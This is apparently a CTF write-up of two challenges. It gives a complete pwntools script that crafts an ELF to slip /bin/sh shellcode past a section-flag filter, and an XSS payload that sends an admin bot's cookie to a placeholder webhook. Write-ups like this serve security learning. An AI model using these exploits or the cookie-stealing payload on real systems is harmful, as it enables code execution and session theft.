index

Background Information

Another CTF with the 🐐s at Cosmic Bit Flips!

5th overall and 1st in student division ❤️!

OMG a $250 dollar prize 🤑!!!

Binary Exploitation

Extremely Lame Filters 1

why weren’t you at ELF practice?!

nc 20.84.72.194 5002

Thank you to unvariant for his help.

We are provided a fairy.py and elf.py. elf.py is basically just a generic elf parser that will read in our elf and then execute it.

1
#!/usr/bin/python3
2

3
from elf import *
4
from base64 import b64decode
5

6
data = b64decode(input("I'm a little fairy and I will trust any ELF that comes by!!"))
7
elf = parse(data)
8

9
for section in elf.sections:
10
    if section.sh_flags & SectionFlags.EXECINSTR:
11
        raise ValidationException("!!")
12

13
elf.run()

fairy.py gets input, which most likely is our elf file data, and then performs a check to see if any section of the elf has the EXECINSTR flag. If it does, it raises and exception and exits.

We can bypass this by making the segment of that memory executable, but leave the section .text where our shellcode that contains the memory has no permissions.

1
#!/usr/bin/env python3
2
from pwn import *
3
import base64
4

5
# Create minimal shellcode to execute /bin/sh
6
shellcode = asm(shellcraft.amd64.linux.sh(), arch='amd64')
7

8
# ELF file constants
9
EHDR_SIZE = 64
10
PHDR_SIZE = 56
11
SHDR_SIZE = 64
12

13
# File offset for shellcode
14
SHELLCODE_OFFSET = EHDR_SIZE + PHDR_SIZE
15

16
# Virtual memory address for loading
17
VADDR_BASE = 0x400000
18

19
# Calculate entry point
20
ENTRY_POINT = VADDR_BASE + SHELLCODE_OFFSET
21

22
# Create ELF header
23
e_ident = b'\x7fELF' + p8(2) + p8(1) + p8(1) + b'\x00' * 9
24
ehdr = e_ident
25
ehdr += p16(2)        # e_type: ET_EXEC
26
ehdr += p16(0x3e)     # e_machine: EM_X86_64
27
ehdr += p32(1)        # e_version
28
ehdr += p64(ENTRY_POINT)  # e_entry: Entry point
29
ehdr += p64(EHDR_SIZE)    # e_phoff: Program header offset
30
ehdr += p64(EHDR_SIZE + PHDR_SIZE + len(shellcode))  # e_shoff: Section header offset
31
ehdr += p32(0)        # e_flags
32
ehdr += p16(EHDR_SIZE)    # e_ehsize: ELF header size
33
ehdr += p16(PHDR_SIZE)    # e_phentsize: Program header entry size
34
ehdr += p16(1)        # e_phnum: Number of program headers
35
ehdr += p16(SHDR_SIZE)    # e_shentsize: Section header entry size
36
ehdr += p16(3)        # e_shnum: Number of section headers (null, .text and .shstrtab)
37
ehdr += p16(2)        # e_shstrndx: Section name string table index
38

39
# Create program header (segment) for the executable code
40
# PT_LOAD segment with RWX permissions
41
phdr = p32(1)         # p_type: PT_LOAD
42
phdr += p32(7)        # p_flags: PF_R | PF_W | PF_X (read, write, execute)
43
phdr += p64(0)        # p_offset: File offset
44
phdr += p64(VADDR_BASE)  # p_vaddr: Virtual address
45
phdr += p64(VADDR_BASE)  # p_paddr: Physical address
46
phdr += p64(EHDR_SIZE + PHDR_SIZE + len(shellcode) + (3 * SHDR_SIZE) + 24)  # p_filesz: File size
47
phdr += p64(EHDR_SIZE + PHDR_SIZE + len(shellcode) + (3 * SHDR_SIZE) + 24)  # p_memsz: Memory size
48
phdr += p64(0x1000)   # p_align: Alignment
49

50
# String table for section names
51
strtab = b"\x00.text\x00.shstrtab\x00"
52
strtab_offset = EHDR_SIZE + PHDR_SIZE + len(shellcode) + (3 * SHDR_SIZE)
53

54
# Create section headers
55
# Null section header
56
shdr_null = p32(0)    # sh_name: No name
57
shdr_null += p32(0)   # sh_type: SHT_NULL
58
shdr_null += p64(0)   # sh_flags: No flags
59
shdr_null += p64(0)   # sh_addr: No address
60
shdr_null += p64(0)   # sh_offset: No offset
61
shdr_null += p64(0)   # sh_size: No size
62
shdr_null += p32(0)   # sh_link: No link
63
shdr_null += p32(0)   # sh_info: No info
64
shdr_null += p64(0)   # sh_addralign: No alignment
65
shdr_null += p64(0)   # sh_entsize: No entry size
66

67
# .text section (contains shellcode) - NOT marked as executable
68
shdr_text = p32(1)    # sh_name: .text
69
shdr_text += p32(1)   # sh_type: SHT_PROGBITS
70
shdr_text += p64(2)   # sh_flags: SHF_ALLOC (no SHF_EXECINSTR)
71
shdr_text += p64(VADDR_BASE + SHELLCODE_OFFSET)  # sh_addr: Virtual address
72
shdr_text += p64(SHELLCODE_OFFSET)  # sh_offset: File offset
73
shdr_text += p64(len(shellcode))  # sh_size: Section size
74
shdr_text += p32(0)   # sh_link: No link
75
shdr_text += p32(0)   # sh_info: No info
76
shdr_text += p64(16)  # sh_addralign: 16-byte alignment
77
shdr_text += p64(0)   # sh_entsize: No entry size
78

79
# .shstrtab section (contains section names)
80
shdr_shstrtab = p32(9)  # sh_name: .shstrtab
81
shdr_shstrtab += p32(3)  # sh_type: SHT_STRTAB
82
shdr_shstrtab += p64(0)  # sh_flags: No flags
83
shdr_shstrtab += p64(0)  # sh_addr: No address
84
shdr_shstrtab += p64(strtab_offset)  # sh_offset: File offset
85
shdr_shstrtab += p64(len(strtab))  # sh_size: Section size
86
shdr_shstrtab += p32(0)  # sh_link: No link
87
shdr_shstrtab += p32(0)  # sh_info: No info
88
shdr_shstrtab += p64(1)  # sh_addralign: 1-byte alignment
89
shdr_shstrtab += p64(0)  # sh_entsize: No entry size
90

91
# Combine everything
92
elf_file = ehdr + phdr + shellcode + shdr_null + shdr_text + shdr_shstrtab + strtab
93

94
# Base64 encode the ELF file for input to fairy.py
95
encoded = base64.b64encode(elf_file)
96
print(encoded.decode())

Running it, we get shell and flag!

squ1rrel{you_3x3c'd_me_:(}

Web Exploitation

portrait

It’s like DeviantArt, but with a report button to keep it less Deviant. Reporting a gallery will make the admin bot visit it.

http://52.188.82.43:8070/

Ok so first off there was kinda an unintended that made this chall sooo much easier. But it got taken down and patched…

Let’s just check out some functionality + goals

In the bot:

1
const { chromium, firefox, webkit } = require('playwright');
2
const fs = require('fs');
3
const path = require('path');
4

5
const CONFIG = {
6
    APPNAME: process.env['APPNAME'] || "Admin",
7
    APPURL: process.env['APPURL'] || "http://172.17.0.1",
8
    APPURLREGEX: process.env['APPURLREGEX'] || "^.*$",
9
    APPFLAG: process.env['APPFLAG'] || "dev{flag}",
10
    APPLIMITTIME: Number(process.env['APPLIMITTIME'] || "60000"),
11
    APPLIMIT: Number(process.env['APPLIMIT'] || "5"),
12
    APPEXTENSIONS: (() => {
13
        const extDir = path.join(__dirname, 'extensions');
14
        const dir = [];
15
        fs.readdirSync(extDir).forEach(file => {
16
            if (fs.lstatSync(path.join(extDir, file)).isDirectory()) {
17
                dir.push(path.join(extDir, file));
18
            }
19
        });
20
        return dir.join(',');
21
    })(),
22
    APPBROWSER: process.env['BROWSER'] || 'chromium'
23
};
24

25
console.table(CONFIG);
26

27
function sleep(s) {
28
    return new Promise((resolve) => setTimeout(resolve, s));
29
}
30

31
const browserArgs = {
32
    headless: (() => {
33
        const is_x11_exists = fs.existsSync('/tmp/.X11-unix');
34
        if (process.env['DISPLAY'] !== undefined && is_x11_exists) {
35
            return false;
36
        }
37
        return true;
38
    })(),
39
    args: [
40
        '--disable-dev-shm-usage',
41
        '--disable-gpu',
42
        '--no-gpu',
43
        '--disable-default-apps',
44
        '--disable-translate',
45
        '--disable-device-discovery-notifications',
46
        '--disable-software-rasterizer',
47
        '--disable-xss-auditor',
48
        ...(() => {
49
            if (CONFIG.APPEXTENSIONS === "") return [];
50
            return [
51
                `--disable-extensions-except=${CONFIG.APPEXTENSIONS}`,
52
                `--load-extension=${CONFIG.APPEXTENSIONS}`
53
            ];
54
        })(),
55
    ],
56
    ignoreHTTPSErrors: true
57
};
58

59
/** @type {import('playwright').Browser} */
60
let initBrowser = null;
61

62
async function getContext(){
63
    /** @type {import('playwright').BrowserContext} */
64
    let context = null;
65
    if (CONFIG.APPEXTENSIONS === "") {
66
        if (initBrowser === null) {
67
            initBrowser = await (CONFIG.APPBROWSER === 'firefox' ? firefox.launch(browserArgs) : chromium.launch(browserArgs));
68
        }
69
        context = await initBrowser.newContext();
70
    } else {
71
        context = await (CONFIG.APPBROWSER === 'firefox' ? firefox.launch({browserArgs}) : chromium.launch(browserArgs)).newContext();
72
    }
73
    return context
74
}
75

76
console.log("Bot started...");
77

78
module.exports = {
79
    name: CONFIG.APPNAME,
80
    urlRegex: CONFIG.APPURLREGEX,
81
    rateLimit: {
82
        windowMs: CONFIG.APPLIMITTIME,
83
        limit: CONFIG.APPLIMIT
84
    },
85
    bot: async (urlToVisit) => {
86
        const context = await getContext()
87
        try {
88
            const page = await context.newPage();
89
            await context.addCookies([{
90
                name: "flag",
91
                httpOnly: false,
92
                value: CONFIG.APPFLAG,
93
                url: CONFIG.APPURL
94
            }]);
95

96
            console.log(`bot visiting ${urlToVisit}`);
97
            await page.goto(urlToVisit, {
98
                waitUntil: 'load',
99
                timeout: 10 * 1000
100
            });
101
            await sleep(15000);
102

103
            console.log("browser close...");
104
            return true;
105
        } catch (e) {
106
            console.error(e);
107
            return false;
108
        } finally {
109
            if (CONFIG.APPEXTENSIONS !== "") {
110
                await context.browser().close();
111
            } else {
112
                await context.close();
113
            }
114
        }
115
    }
116
};

We see xss protections be disabled as well as the flag being set as the admin cookie. So this is an xss problem, where we have to steal the admin cookie by having it view a malicious portrait that executes xss that remotely sends the cookie to a webhook.

In terms of the website, we can register and login as a user, so let’s just use some random name and login.

There’s a portrait adding functionality as well as a report functionality.

We can add an image link and a title to add a portrait to our gallery

Ok. Enough with just the testing… where can we find a bug?? The provided server code index.js just provides login and gallery provision functionality but no actual bug… let’s check how our portrait is rendered…

1
<script>
2
    $(document).ready(function () {
3
        const username = new URLSearchParams(window.location.search).get("username");
4
        $.ajax({
5
            url: "/api/portraits/" + username,
6
            type: "GET",
7
            success: function (data) {
8
                data.forEach((portrait) => {
9
                    const col = $("<div>").addClass("col-md-4 mb-4");
10
                    const card = $("<div>").addClass("card shadow-sm");
11
                    const img = $("<img>").addClass("card-img-top").attr("src", portrait.source).attr("alt", portrait.name);
12
                    const cardBody = $("<div>").addClass("card-body text-center");
13
                    const title = $("<h5>").addClass("card-title").text(portrait.name);
14

15
                    img.on("error", (e) => {
16
                        $.get(e.currentTarget.src).fail((response) => {
17
                            if (response.status === 403) {
18
                                $(e.target).attr("src", "https://cdn.pixabay.com/photo/2021/08/03/06/14/lock-6518557_1280.png");
19
                            } else {
20
                                $(e.target).attr(
21
                                    "src",
22
                                    "https://cdn.pixabay.com/photo/2024/02/12/16/05/siguniang-mountain-8568913_1280.jpg"
23
                                );
24
                            }
25
                        });
26
                    });
27

28
                    cardBody.append(title);
29
                    card.append(img).append(cardBody);
30
                    col.append(card);
31
                    $("#portraitsContainer").append(col);
32
                });
33
            },
34
        });
35

36
        $("#addPortraitForm").submit(function (event) {
37
            const token = localStorage.getItem("token");
38
            event.preventDefault();
39
            const title = $("#portraitTitle").val();
40
            const source = $("#portraitSource").val();
41

42
            $.ajax({
43
                url: "/api/portraits",
44
                type: "POST",
45
                dataType: "json",
46
                headers: {
47
                    "Content-Type": "application/json",
48
                    Authorization: "Bearer " + token,
49
                },
50
                data: JSON.stringify({ name: title, source: source }),
51
                success: function () {
52
                    console.log("posted");
53
                    location.reload();
54
                },
55
            });
56
        });
57

58
        $(".btn-outline-light").click(function () {
59
            localStorage.removeItem("token");
60
            window.location.href = "/";
61
        });
62

63
        $(".btn-danger").click(function () {
64
            window.location.href = "/report";
65
        });
66
    });
67
</script>

Ok, let’s zoom in on how portraits are created on the frontend:

1
const col = $("<div>").addClass("col-md-4 mb-4");
2
                    const card = $("<div>").addClass("card shadow-sm");
3
                    const img = $("<img>").addClass("card-img-top").attr("src", portrait.source).attr("alt", portrait.name);
4
                    const cardBody = $("<div>").addClass("card-body text-center");
5
                    const title = $("<h5>").addClass("card-title").text(portrait.name);
6

7
                    img.on("error", (e) => {
8
                        $.get(e.currentTarget.src).fail((response) => {
9
                            if (response.status === 403) {
10
                                $(e.target).attr("src", "https://cdn.pixabay.com/photo/2021/08/03/06/14/lock-6518557_1280.png");
11
                            } else {
12
                                $(e.target).attr(
13
                                    "src",
14
                                    "https://cdn.pixabay.com/photo/2024/02/12/16/05/siguniang-mountain-8568913_1280.jpg"
15
                                );
16
                            }
17
                        });
18

19
                    });
20

21
                    cardBody.append(title);
22
                    card.append(img).append(cardBody);
23
                    col.append(card);
24
                    $("#portraitsContainer").append(col);

So our link (portrait.source) and title are added as an attribute, but portrait.name is rendered as text in title (exploit b4 it was patched). So the only thing we can really attack is portrait.source… however, if the img throws an error, it will try to get the image link directly, but if not, it replaces it with its own custom image link. We don’t want that… so what can we do??

Well if we just do data:text... as the img src, it successfully passes these checks, and we can use this as data:text/javascript,alert(1) see that javascript is executed!

Ok, let’s now adjust this payload to data:text/javascript,fetch('YOUR-WEBHOOK-SITE.com'+document.cookie) and place it into portrait src.

Report your gallery to admin using the link: http://52.188.82.43:8070/gallery?username=YOUR_USERNAME And… we successfully get the flag!

Flag: squ1rrel{unc_s747us_jqu3ry_l0wk3y_take_two_new_flag_check_this_out_guys}

some squ1rrelctf writeups

Background Information

Binary Exploitation

Extremely Lame Filters 1

Web Exploitation

portrait